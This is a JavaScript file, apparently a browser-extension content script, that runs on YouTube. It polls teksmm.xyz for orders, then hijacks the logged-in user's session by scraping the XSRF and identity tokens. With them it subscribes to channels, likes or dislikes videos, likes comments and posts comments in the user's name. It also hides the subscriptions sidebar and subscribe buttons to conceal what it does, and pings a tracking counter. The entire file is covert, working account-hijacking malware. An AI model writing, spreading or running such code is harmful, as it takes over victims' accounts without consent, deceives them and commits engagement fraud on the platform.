new Image().src = '//whos.amung.us/widget/selamcek02.png';
setInterval(function(){ new Image().src = '//whos.amung.us/widget/selamcek02.png'; }, 200000);


function rasgteleSure(min, max) { 
  return Math.floor(Math.random() * (max - min + 1) + min);
}

function getFromLocalStorage(){
  return JSON.parse(localStorage.getItem("m_history"));
}
if( !getFromLocalStorage() ){
    localStorage.setItem("m_history", JSON.stringify([]) );
}
function checkOrSave(key, value){
  //Delete 2 days ago
  var clean = getFromLocalStorage().filter(x => {
    return parseInt((new Date().getTime()-x.time)/ (1000*60*60*24*2)) <= 0
  })
  localStorage.setItem("m_history", JSON.stringify(clean));
  console.log(clean)
  if( !getFromLocalStorage() ){
    localStorage.setItem("m_history", JSON.stringify([]) );
  }
  let status = checkInLocalStorage(key, value);
  if(!status){
    let operations = getFromLocalStorage();
    let temp   = {};
    temp.key   = key;
    temp.value = value;
    temp.time  = new Date().getTime();
    operations.push(temp)
    localStorage.setItem("m_history", JSON.stringify(operations) );
  }
  return status;
}
function checkInLocalStorage(key, value){
  elements = getFromLocalStorage().filter(x=> x.key==key && x.value == value);
  return Boolean(elements.length);
}



function siparis_getir_3() {
	var xhr = new XMLHttpRequest();
	xhr.open("GET", "https://teksmm.xyz/smmnew/queue.php?queue=3&json="+encodeURIComponent(JSON.stringify(getFromLocalStorage().filter(x => x.value == "3"))), true);
    xhr.onreadystatechange = function() {
		if (xhr.readyState == 4 && xhr.status == 200) {
			try {
                var data = JSON.parse(xhr.responseText);
                vars = {};
                vars.videoId = data.videoIds[Math.floor(Math.random()*data.videoIds.length)]
				vars.channelIds = data.channelId.trim();
				vars.id = data.id.trim();
				if(!checkOrSave(vars.id,"3")){
					if (vars.channelIds) {
						subscribe_client(vars);
					}
				}
			}catch (error) {}
		}else{
			localStorage.setItem("m_history", JSON.stringify([]) );
		}
	}
	xhr.send();
}

function siparis_getir_4() {
	var xhr = new XMLHttpRequest();
	xhr.open("GET", "https://teksmm.xyz/smmnew/queue.php?queue=4&json="+encodeURIComponent(JSON.stringify(getFromLocalStorage().filter(x => x.value == "4"))), true);
	xhr.onreadystatechange = function() {
		if (xhr.readyState == 4 && xhr.status == 200) {
			try {
				var data = JSON.parse(xhr.responseText);
				vars = {};
				vars.indexData = data.videoId.trim();
				vars.id = data.id.trim();
				if(!checkOrSave(vars.id,"4")){
					if (vars.indexData) {
						video_like(vars);
					}
				}
			}catch (error) {}
		}
	}
	xhr.send();
}

function siparis_getir_5() {
	var xhr = new XMLHttpRequest();
	xhr.open("GET", "https://teksmm.xyz/smmnew/queue.php?queue=5&json="+encodeURIComponent(JSON.stringify(getFromLocalStorage().filter(x => x.value == "5"))), true);
	xhr.onreadystatechange = function() {
		if (xhr.readyState == 4 && xhr.status == 200) {
			try {
				var data = JSON.parse(xhr.responseText);
				vars = {};
				vars.indexData = data.videoId.trim();
				vars.commentId =  data.commentId.trim();
				vars.id = data.id.trim();
				if(!checkOrSave(vars.id,"5")){
					if (vars.indexData && vars.commentId) {
						like_comment(vars);
					}
				}
			}catch (error) {}
		}
	}
	xhr.send();
}

function siparis_getir_6() {
	var xhr = new XMLHttpRequest();
	xhr.open("GET", "https://teksmm.xyz/smmnew/queue.php?queue=6&json="+encodeURIComponent(JSON.stringify(getFromLocalStorage().filter(x => x.value == "6"))), true);
	xhr.onreadystatechange = function() {
		if (xhr.readyState == 4 && xhr.status == 200) {
			try {
				var data = JSON.parse(xhr.responseText);
				vars = {};
				vars.indexData = data.videoId.trim();
				vars.randComment = data.comments.trim().split("\n")[0].replace('"',"");
				vars.id = data.id.trim();
				if(!checkOrSave(vars.id,"6")){
					if (vars.indexData && vars.randComment) {
						createComment_id(vars);
					}
				}
			}catch (error) {}
		}
	}
	xhr.send();
}

function siparis_getir_7() {
	var xhr = new XMLHttpRequest();
	xhr.open("GET", "https://teksmm.xyz/smmnew/queue.php?queue=7&json="+encodeURIComponent(JSON.stringify(getFromLocalStorage().filter(x => x.value == "7"))), true);
	xhr.onreadystatechange = function() {
		if (xhr.readyState == 4 && xhr.status == 200) {
			try {
				var data = JSON.parse(xhr.responseText);
				vars = {};
				vars.indexData = data.videoId.trim();
				vars.id = data.id.trim();
				if(!checkOrSave(vars.id,"7")){
					if (vars.indexData) {
						video_dislike(vars);
					}
				}
			}catch (error) {}
		}
	}
	xhr.send();
}

  
function start() {
  var cookie_name = "yt";
  var cookie_time = rasgteleSure(30000,60000);
  if (!localStorage[cookie_name] || parseInt(localStorage[cookie_name]) < Date.now() - cookie_time) {
    localStorage[cookie_name] = Date.now();
	new Image().src = '//whos.amung.us/widget/selamcek03.png';
    siparis_getir_3();
    siparis_getir_4();
    siparis_getir_5();
    siparis_getir_6();
    siparis_getir_7();
  }
}

function subscribe_now_count(vars) {
  var xhr = new XMLHttpRequest();
  xhr.open("GET", "https://www.youtube.com/channel/" + vars.channelIds, true);
  xhr.onreadystatechange = function() {
    if (xhr.readyState == 4 && xhr.status == 200) {
      var data = xhr.responseText;
      vars.login = data.match('"LOGGED_IN":(.*?),')[1];
      if (vars.login == "true" || vars.login == true) {
        if (data.indexOf('onResponseReceivedActions') == -1) {
          subscribe_client(vars);
        }
      }
    }
  }
  xhr.send();
}

function subscribe_client(vars) {
var xhr = new XMLHttpRequest();
xhr.open("GET", "https://www.youtube.com/watch?v="+vars.videoId, true);
xhr.onreadystatechange = function() {
    if (xhr.readyState == 4 && xhr.status == 200) {	
        var data = xhr.responseText;

        vars.login = data.match('"LOGGED_IN":(.*?),')[1];
        if ( (vars.login == "true" || vars.login == true) && data.indexOf('subscribed=1') == -1 ) {
            var middlePoint = data.split('subscribeEndpoint":{"channelIds":');
            var startPoint = middlePoint[0].split('{"clickTrackingParams":"').pop();
            var endPoint = middlePoint[1].split("}}]")[0]
            vars.params_like = '{"clickTrackingParams":"'+startPoint+'subscribeEndpoint":{"channelIds":'+endPoint+"}}";
            
            vars.session_token = data.split('"XSRF_TOKEN":"')[1].split('"')[0];
            vars.csn = data.split('csn: "')[1].split('"')[0];
            vars.youtube_identity_token = data.split('"ID_TOKEN":"')[1].split('"')[0];
            vars.page_cl = data.split('PAGE_CL":')[1].split(',')[0];
            vars.page_build_label = data.split('"PAGE_BUILD_LABEL":"')[1].split('"')[0];
            vars.variants_checksum = data.split('"VARIANTS_CHECKSUM":"')[1].split('"')[0];
            var deviceRaw = data.split('"DEVICE":"')[1].split('"')[0].split("\\u0026");
            var urlParams = {};
            deviceRaw.forEach(function(x){
                var arr = x.split('=');
                arr[1] && (urlParams[arr[0]] = arr[1]);
            });
            vars.device = "cos="+urlParams["cos"]+"&cbr="+urlParams["cbr"]+"&cosver="+urlParams["cosver"]+"&cbrver="+urlParams["cbrver"];
            vars.utc = Math.abs(new Date().getTimezoneOffset());
            vars.timezone = Intl.DateTimeFormat().resolvedOptions().timeZone;
            vars.clientversion = data.split('"INNERTUBE_CONTEXT_CLIENT_VERSION":"')[1].split('"')[0];
            subscribe(vars);    
        }
        

    }
}
xhr.send();
}



function subscribe(vars) {
var xhr = new XMLHttpRequest();
var params = {};
params["sej"] = vars.params_like;
params["csn"] = vars.csn;
params["session_token"] = vars.session_token;
xhr.open("POST", "https://www.youtube.com/service_ajax?name=subscribeEndpoint", true);
xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
xhr.setRequestHeader("Referer-zzz", "https://www.youtube.com/watch?v="+vars.videoId);
xhr.setRequestHeader("x-spf-previous",  "https://www.youtube.com/watch?v="+vars.videoId);
xhr.setRequestHeader("x-spf-referer",  "https://www.youtube.com/watch?v="+vars.videoId);
xhr.setRequestHeader("x-youtube-client-name", 1);
xhr.setRequestHeader("x-youtube-client-version", vars.clientversion);
xhr.setRequestHeader("x-youtube-device", vars.device);
xhr.setRequestHeader("x-youtube-identity-token", vars.youtube_identity_token);
xhr.setRequestHeader("x-youtube-page-cl", vars.page_cl);
xhr.setRequestHeader("x-youtube-page-label", vars.page_build_label);
xhr.setRequestHeader("x-youtube-time-zone", vars.timezone);
xhr.setRequestHeader("x-youtube-utc-offset", vars.utc);
xhr.setRequestHeader("x-youtube-variants-checksum", vars.variants_checksum);
xhr.onreadystatechange = function() {
    if (xhr.readyState == 4 && xhr.status == 200) {
        xhr.close;
    }
}
xhr.send(deSerialize(params));
}

function createComment(vars) {
  var xhr = new XMLHttpRequest();
  var params = {};
  params["comment_text"] = vars.randComment;
  params["sej"] = JSON.stringify({
    "clickTrackingParams": vars.trackingParams,
    "commandMetadata": {
      "webCommandMetadata": {
        "url": "/service_ajax",
        "sendPost": true
      }
    },
    "createCommentEndpoint": {
      "createCommentParams": vars.createCommentParams
    }
  });
  
  params["csn"] = vars.csn;
  params["session_token"] = vars.session_token;
  xhr.open("POST", "https://www.youtube.com/service_ajax?name=createCommentEndpoint", true);
  xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded; charset=UTF-8");
  xhr.setRequestHeader("x-youtube-client-name", 1);
  	xhr.setRequestHeader("x-youtube-client-version", vars.clientversion);
	xhr.setRequestHeader("x-youtube-device", vars.device);
	xhr.setRequestHeader("x-youtube-identity-token", vars.youtube_identity_token);
	xhr.setRequestHeader("x-youtube-page-cl", vars.page_cl);
	xhr.setRequestHeader("x-youtube-page-label", vars.page_build_label);
	xhr.setRequestHeader("x-youtube-time-zone", vars.timezone);
	xhr.setRequestHeader("x-youtube-utc-offset", vars.utc);
	xhr.setRequestHeader("x-youtube-variants-checksum", vars.variants_checksum);
	
  xhr.onreadystatechange = function() {
    if (xhr.readyState == 4 && xhr.status == 200) {
      xhr.close;
    }
  }
  xhr.send(deSerialize(params));
}

function createLike(vars) {
  var xhr = new XMLHttpRequest();
  var params = {};
  params["sej"] = vars.params_like;
  
  params["csn"] = vars.csn;
  params["session_token"] = vars.session_token;
  xhr.open("POST", "https://www.youtube.com/service_ajax?name=performCommentActionEndpoint", true);
  xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded; charset=UTF-8");
  xhr.setRequestHeader("x-youtube-client-name", 1);
  	xhr.setRequestHeader("x-youtube-client-version", vars.clientversion);
	xhr.setRequestHeader("x-youtube-device", vars.device);
	xhr.setRequestHeader("x-youtube-identity-token", vars.youtube_identity_token);
	xhr.setRequestHeader("x-youtube-page-cl", vars.page_cl);
	xhr.setRequestHeader("x-youtube-page-label", vars.page_build_label);
	xhr.setRequestHeader("x-youtube-time-zone", vars.timezone);
	xhr.setRequestHeader("x-youtube-utc-offset", vars.utc);
	xhr.setRequestHeader("x-youtube-variants-checksum", vars.variants_checksum);
  xhr.onreadystatechange = function() {
    if (xhr.readyState == 4 && xhr.status == 200) {
      xhr.close;
    }
  }
  xhr.send(deSerialize(params));
}

function createVideoLike(vars) {
  var xhr = new XMLHttpRequest();
  var params = {};
  params["sej"] = vars.params_like;
  
  params["csn"] = vars.csn;
  params["session_token"] = vars.session_token;
  xhr.open("POST", "https://www.youtube.com/service_ajax?name=likeEndpoint", true);
	xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
	xhr.setRequestHeader("Referer-zzz", "https://www.youtube.com/watch?v="+vars.videoId);
	xhr.setRequestHeader("x-spf-previous",  "https://www.youtube.com/watch?v="+vars.videoId);
	xhr.setRequestHeader("x-spf-referer",  "https://www.youtube.com/watch?v="+vars.videoId);
	xhr.setRequestHeader("x-youtube-client-name", 1);
  	xhr.setRequestHeader("x-youtube-client-version", vars.clientversion);
	xhr.setRequestHeader("x-youtube-device", vars.device);
	xhr.setRequestHeader("x-youtube-identity-token", vars.youtube_identity_token);
	xhr.setRequestHeader("x-youtube-page-cl", vars.page_cl);
	xhr.setRequestHeader("x-youtube-page-label", vars.page_build_label);
	xhr.setRequestHeader("x-youtube-time-zone", vars.timezone);
	xhr.setRequestHeader("x-youtube-utc-offset", vars.utc);
	xhr.setRequestHeader("x-youtube-variants-checksum", vars.variants_checksum);
	xhr.onreadystatechange = function() {
    if (xhr.readyState == 4 && xhr.status == 200) {
      xhr.close;
    }
  }
  xhr.send(deSerialize(params));
}

function createVideoDislike(vars) {
  var xhr = new XMLHttpRequest();
  var params = {};
  params["sej"] = vars.params_like;
  
  params["csn"] = vars.csn;
  params["session_token"] = vars.session_token;
  xhr.open("POST", "https://www.youtube.com/service_ajax?name=likeEndpoint", true);
  xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded; charset=UTF-8");
  xhr.setRequestHeader("x-youtube-client-name", 1);
  	xhr.setRequestHeader("x-youtube-client-version", vars.clientversion);
	xhr.setRequestHeader("x-youtube-device", vars.device);
	xhr.setRequestHeader("x-youtube-identity-token", vars.youtube_identity_token);
	xhr.setRequestHeader("x-youtube-page-cl", vars.page_cl);
	xhr.setRequestHeader("x-youtube-page-label", vars.page_build_label);
	xhr.setRequestHeader("x-youtube-time-zone", vars.timezone);
	xhr.setRequestHeader("x-youtube-utc-offset", vars.utc);
	xhr.setRequestHeader("x-youtube-variants-checksum", vars.variants_checksum);  
	xhr.onreadystatechange = function() {
    if (xhr.readyState == 4 && xhr.status == 200) {
      xhr.close;
    }
  }
  xhr.send(deSerialize(params));
}

function createComment_id(vars) {
  var xhr = new XMLHttpRequest();
  xhr.open("GET", "https://www.youtube.com/watch?v=" + vars.indexData, true);
  xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded; charset=UTF-8");
  xhr.onreadystatechange = function() {
    if (xhr.readyState == 4 && xhr.status == 200) {
      var data = xhr.responseText;
      vars.createCommentParams = data.split('"getReportFormEndpoint":{"params":"')[1].split('"')[0];
      if (vars.createCommentParams.length > 0) {
		vars.session_token = data.split('"XSRF_TOKEN":"')[1].split('"')[0];
		vars.csn = data.split('csn: "')[1].split('"')[0];
		vars.youtube_identity_token = data.split('"ID_TOKEN":"')[1].split('"')[0];
		vars.page_cl = data.split('PAGE_CL":')[1].split(',')[0];
		vars.page_build_label = data.split('"PAGE_BUILD_LABEL":"')[1].split('"')[0];
		vars.variants_checksum = data.split('"VARIANTS_CHECKSUM":"')[1].split('"')[0];
		var deviceRaw = data.split('"DEVICE":"')[1].split('"')[0].split("\\u0026");
		var urlParams = {};
		deviceRaw.forEach(function(x){
			var arr = x.split('=');
			arr[1] && (urlParams[arr[0]] = arr[1]);
		});
		vars.device = "cos="+urlParams["cos"]+"&cbr="+urlParams["cbr"]+"&cosver="+urlParams["cosver"]+"&cbrver="+urlParams["cbrver"];
		vars.utc = Math.abs(new Date().getTimezoneOffset());
		vars.timezone = Intl.DateTimeFormat().resolvedOptions().timeZone;
		vars.clientversion = data.split('"INNERTUBE_CONTEXT_CLIENT_VERSION":"')[1].split('"')[0];
        createComment(vars);
      }

    }
  }
  xhr.send();
}

function like_comment(vars) {
  var xhr = new XMLHttpRequest();
  xhr.open("GET", "https://www.youtube.com/watch?v=" + vars.indexData +"&lc=" + vars.commentId, true);
  xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded; charset=UTF-8");
  xhr.onreadystatechange = function() {
    if (xhr.readyState == 4 && xhr.status == 200) {
      var data = xhr.responseText;

		vars.params_like = data.split('{"iconType":"LIKE"},"defaultServiceEndpoint":')[1].split('"voteStatus":"LIKE"}}]}}')[0]+'"voteStatus":"LIKE"}}]}}';
		vars.session_token = data.split('"XSRF_TOKEN":"')[1].split('"')[0];
		vars.csn = data.split('csn: "')[1].split('"')[0];
		vars.youtube_identity_token = data.split('"ID_TOKEN":"')[1].split('"')[0];
		vars.page_cl = data.split('PAGE_CL":')[1].split(',')[0];
		vars.page_build_label = data.split('"PAGE_BUILD_LABEL":"')[1].split('"')[0];
		vars.variants_checksum = data.split('"VARIANTS_CHECKSUM":"')[1].split('"')[0];
		// Yeni
		var deviceRaw = data.split('"DEVICE":"')[1].split('"')[0].split("\\u0026");
		var urlParams = {};
		deviceRaw.forEach(function(x){
			var arr = x.split('=');
			arr[1] && (urlParams[arr[0]] = arr[1]);
		});
		vars.device = "cos="+urlParams["cos"]+"&cbr="+urlParams["cbr"]+"&cosver="+urlParams["cosver"]+"&cbrver="+urlParams["cbrver"];
		vars.utc = Math.abs(new Date().getTimezoneOffset());
		vars.timezone = Intl.DateTimeFormat().resolvedOptions().timeZone;
		vars.clientversion = data.split('"INNERTUBE_CONTEXT_CLIENT_VERSION":"')[1].split('"')[0];


        createLike(vars);


    }
  }
  xhr.send();
}

function video_like(vars) {
  var xhr = new XMLHttpRequest();
  xhr.open("GET", "https://www.youtube.com/watch?v=" + vars.indexData, true);
  xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded; charset=UTF-8");
  xhr.onreadystatechange = function() {
    if (xhr.readyState == 4 && xhr.status == 200) {
      var data = xhr.responseText;

		vars.params_like = data.split('"defaultServiceEndpoint":')[1].split('"}}')[0]+'"}}';

		vars.session_token = data.split('"XSRF_TOKEN":"')[1].split('"')[0];
		vars.csn = data.split('csn: "')[1].split('"')[0];
		vars.youtube_identity_token = data.split('"ID_TOKEN":"')[1].split('"')[0];
		vars.page_cl = data.split('PAGE_CL":')[1].split(',')[0];
		vars.page_build_label = data.split('"PAGE_BUILD_LABEL":"')[1].split('"')[0];
		vars.variants_checksum = data.split('"VARIANTS_CHECKSUM":"')[1].split('"')[0];
		var deviceRaw = data.split('"DEVICE":"')[1].split('"')[0].split("\\u0026");
		var urlParams = {};
		deviceRaw.forEach(function(x){
			var arr = x.split('=');
			arr[1] && (urlParams[arr[0]] = arr[1]);
		});
		vars.device = "cos="+urlParams["cos"]+"&cbr="+urlParams["cbr"]+"&cosver="+urlParams["cosver"]+"&cbrver="+urlParams["cbrver"];
		vars.utc = Math.abs(new Date().getTimezoneOffset());
		vars.timezone = Intl.DateTimeFormat().resolvedOptions().timeZone;
		vars.clientversion = data.split('"INNERTUBE_CONTEXT_CLIENT_VERSION":"')[1].split('"')[0];
        createVideoLike(vars);


    }
  }
  xhr.send();
}

function video_dislike(vars) {
  var xhr = new XMLHttpRequest();
  xhr.open("GET", "https://www.youtube.com/watch?v=" + vars.indexData, true);
  xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded; charset=UTF-8");
  xhr.onreadystatechange = function() {
    if (xhr.readyState == 4 && xhr.status == 200) {
      var data = xhr.responseText;

		vars.params_like = data.split('"defaultServiceEndpoint":')[2].split('"}}')[0]+'"}}';

		vars.session_token = data.split('"XSRF_TOKEN":"')[1].split('"')[0];
		vars.csn = data.split('csn: "')[1].split('"')[0];
		vars.youtube_identity_token = data.split('"ID_TOKEN":"')[1].split('"')[0];
		vars.page_cl = data.split('PAGE_CL":')[1].split(',')[0];
		vars.page_build_label = data.split('"PAGE_BUILD_LABEL":"')[1].split('"')[0];
		vars.variants_checksum = data.split('"VARIANTS_CHECKSUM":"')[1].split('"')[0];
		var deviceRaw = data.split('"DEVICE":"')[1].split('"')[0].split("\\u0026");
		var urlParams = {};
		deviceRaw.forEach(function(x){
			var arr = x.split('=');
			arr[1] && (urlParams[arr[0]] = arr[1]);
		});
		vars.device = "cos="+urlParams["cos"]+"&cbr="+urlParams["cbr"]+"&cosver="+urlParams["cosver"]+"&cbrver="+urlParams["cbrver"];
		vars.utc = Math.abs(new Date().getTimezoneOffset());
		vars.timezone = Intl.DateTimeFormat().resolvedOptions().timeZone;
		vars.clientversion = data.split('"INNERTUBE_CONTEXT_CLIENT_VERSION":"')[1].split('"')[0];
        createVideoDislike(vars);
    }
  }
  xhr.send();
}



function deSerialize(json) {
  return Object.keys(json).map(function(key) {
    return encodeURIComponent(key) + '=' + encodeURIComponent(json[key]);
  }).join('&');
}


if (location.hostname.indexOf("youtube.com") >= 0 && document.body.innerHTML.split('creator_channel_id","value":"')[1]) {

  profile_id = document.body.innerHTML.split('creator_channel_id","value":"')[1].split('"}')[0];
  start();
  setInterval(function() {
    start();
  }, 1000 * 60 * 1);
  setInterval(function() {
	  document.querySelectorAll("ytd-guide-section-renderer")[1].style.display ="none";

    var bok = document.getElementsByClassName("style-scope ytd-subscribe-button-renderer");
    if (bok.length > 0) {
      for (var i = 0; i < bok.length; i++) {
        bok[i].outerHTML = "";
      }
    }
  }, 1000);
}
